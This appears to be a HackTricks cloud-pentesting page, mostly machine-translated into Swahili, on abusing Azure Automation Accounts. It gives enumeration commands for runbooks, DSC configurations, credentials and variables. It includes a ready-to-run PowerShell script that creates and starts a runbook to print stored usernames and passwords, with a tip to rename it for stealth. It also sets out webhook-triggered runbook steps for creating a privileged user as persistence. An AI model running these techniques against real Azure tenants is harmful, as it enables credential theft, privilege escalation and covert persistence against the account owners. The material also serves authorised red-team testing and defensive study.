Az - Automation Account

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

From the docs: Azure Automation inatoa huduma ya automatisering ya msingi ya wingu, masasisho ya mfumo wa uendeshaji, na huduma ya usanidi inayosaidia usimamizi thabiti katika mazingira yako ya Azure na yasiyo ya Azure. Inajumuisha automatisering ya mchakato, usimamizi wa usanidi, usimamizi wa masasisho, uwezo wa pamoja, na vipengele tofauti.

Hizi ni kama "kazi zilizopangwa" katika Azure ambazo zitakuruhusu kutekeleza mambo (vitendo au hata skripti) ili kusimamia, kuangalia na kuunda mazingira ya Azure.

Run As Account

Wakati Run as Account inatumika, inaunda maombi ya Azure AD yenye cheti kilichojisaini, inaunda mwakilishi wa huduma na inatoa jukumu la Mchangiaji kwa akaunti katika usajili wa sasa (haki nyingi). Microsoft inapendekeza kutumia Utambulisho wa Kusimamiwa kwa Akaunti ya Automation.

Hii itakuwa imeondolewa tarehe 30 Septemba 2023 na kubadilishwa kwa Utambulisho wa Kusimamiwa.

Runbooks & Jobs

Runbooks zinakuruhusu kutekeleza msimbo wa PowerShell bila mipaka. Hii inaweza kutumiwa vibaya na mshambuliaji kuiba ruhusa za mwakilishi ulioambatanishwa (ikiwa upo). Katika msimbo wa Runbooks unaweza pia kupata habari nyeti (kama vile akidi).

Ikiwa unaweza kusoma kazi, fanya hivyo kwani zinashikilia matokeo ya kukimbia (habari nyeti zinazoweza kuwa).

Nenda kwa Automation Accounts --> <Select Automation Account> --> Runbooks/Jobs/Hybrid worker groups/Watcher tasks/credentials/variables/certificates/connections

Hybrid Worker

Runbook inaweza kukimbizwa katika konteina ndani ya Azure au katika Hybrid Worker (kifaa kisichokuwa cha azure). Log Analytics Agent inapelekwa kwenye VM kuisajili kama mfanyakazi wa hybrid. Kazi za mfanyakazi wa hybrid zinakimbizwa kama SYSTEM kwenye Windows na akaunti ya nxautomation kwenye Linux. Kila Mfanyakazi wa Hybrid anasajiliwa katika Kikundi cha Wafanyakazi wa Hybrid.

Hivyo, ikiwa unaweza kuchagua kukimbiza Runbook katika Mfanyakazi wa Hybrid wa Windows, utaweza kutekeleza amri zisizo na mipaka ndani ya kifaa cha nje kama System (mbinu nzuri ya pivot).

Compromise State Configuration (SC)

From the docs: Azure Automation State Configuration ni huduma ya usimamizi wa usanidi wa Azure inayokuruhusu kuandika, kusimamia, na kukusanya Usanidi wa Hali ya PowerShell (DSC) usanidi kwa nodi katika wingu lolote au kituo cha data cha ndani. Huduma pia inaingiza Rasilimali za DSC, na inatoa usanidi kwa nodi lengwa, yote katika wingu. Unaweza kufikia Usanidi wa Hali ya Azure Automation katika lango la Azure kwa kuchagua Usanidi wa hali (DSC) chini ya Usimamizi wa Usanidi.

Habari nyeti zinaweza kupatikana katika usanidi hizi.

RCE

Inawezekana kutumia SC vibaya kukimbiza skripti zisizo na mipaka katika mashine zinazodhibitiwa.

Az - State Configuration RCE

Enumeration

# Check user right for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the user is not a part of an Automation group

# Gets Azure Automation accounts in a resource group
Get-AzAutomationAccount

# List & get DSC configs
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match '<name>'} | Export-AzAutomationDscConfiguration -OutputFolder . -Debug
## Automation Accounts named SecurityBaselineConfigurationWS... are there by default (not interesting)

# List & get Run books code
Get-AzAutomationAccount | Get-AzAutomationRunbook
Get-AzAutomationAccount | Get-AzAutomationRunbook | Export-AzAutomationRunbook -OutputFolder /tmp

# List credentials & variables & others
Get-AzAutomationAccount | Get-AzAutomationCredential
Get-AzAutomationAccount | Get-AzAutomationVariable
Get-AzAutomationAccount | Get-AzAutomationConnection
Get-AzAutomationAccount | Get-AzAutomationCertificate
Get-AzAutomationAccount | Get-AzAutomationSchedule
Get-AzAutomationAccount | Get-AzAutomationModule
Get-AzAutomationAccount | Get-AzAutomationPython3Package
## Exfiltrate credentials & variables and the other info loading them in a Runbook and printing them

# List hybrid workers
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>

Pata Creds & Variables zilizofafanuliwa katika Akaunti ya Automation kwa kutumia Kitabu cha Kimbunga

# Change the crdentials & variables names and add as many as you need
@'
$creds = Get-AutomationPSCredential -Name <credentials_name>
$runbook_variable = Get-AutomationVariable -name <variable_name>
$runbook_variable
$creds.GetNetworkCredential().username
$creds.GetNetworkCredential().password
'@ | out-file -encoding ascii 'runbook_get_creds.ps1'

$ResourceGroupName = '<resource_group_name>'
$AutomationAccountName = '<auto_acc_name>'
$RunBookName = 'Exif-Credentials' #Change this for stealthness

# Creare Run book, publish, start, and get output
New-AzAutomationRunBook -name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Type PowerShell
Import-AzAutomationRunBook -Path 'runbook_get_creds.ps1' -Name $RunBookName -Type PowerShell -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Force
Publish-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
$start = Start-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
start-sleep 20
($start | Get-AzAutomationJob | Get-AzAutomationJobOutput).Summarynt

Unaweza kufanya jambo hilo hilo kwa kubadilisha Run Book iliyopo, na kutoka kwenye console ya wavuti.

Hatua za Kuweka Mchakato wa Kuunda Mtumiaji wa Juu Kiotomatiki

1. Anzisha Akaunti ya Kiotomatiki

Hatua Inayohitajika: Unda Akaunti mpya ya Kiotomatiki.
Mipangilio Maalum: Hakikisha "Unda akaunti ya Azure Run As" imewezeshwa.

2. Ingiza na Weka Mchakato wa Kuendesha

Chanzo: Pakua mchakato wa mfano kutoka MicroBurst GitHub Repository.
Hatua Zinazohitajika:
Ingiza mchakato wa kuendesha kwenye Akaunti ya Kiotomatiki.
Chapisha mchakato wa kuendesha ili uweze kutekelezwa.
Unganisha webhook kwa mchakato wa kuendesha, ukiruhusu vichocheo vya nje.

3. Sanidi Moduli ya AzureAD

Hatua Inayohitajika: Ongeza moduli ya AzureAD kwenye Akaunti ya Kiotomatiki.
Hatua ya Ziada: Hakikisha moduli zote za Azure Automation zimeboreshwa hadi toleo zao za hivi punde.

4. Ugawaji wa Ruhusa

Majukumu ya Kuweka:
Msimamizi wa Mtumiaji
Mmiliki wa Usajili
Lengo: Panga majukumu haya kwa Akaunti ya Kiotomatiki kwa ruhusa zinazohitajika.

5. Ufahamu wa Kupoteza Upatikanaji

Kumbuka: Kuwa makini kwamba kusanidi kiotomatiki kama hiki kunaweza kusababisha kupoteza udhibiti wa usajili.

6. Chochea Uundaji wa Mtumiaji

Chochea webhook ili kuunda mtumiaji mpya kwa kutuma ombi la POST.
Tumia script ya PowerShell iliyotolewa, hakikisha kubadilisha $uri na URL yako halisi ya webhook na kuboresha $AccountInfo na jina la mtumiaji na nenosiri unalotaka.

$uri = "<YOUR_WEBHOOK_URL>"
$AccountInfo  = @(@{RequestBody=@{Username="<DESIRED_USERNAME>";Password="<DESIRED_PASSWORD>"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body

References

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAz - ARM Templates / Deployments NextAz - State Configuration RCE

Last updated 3 days ago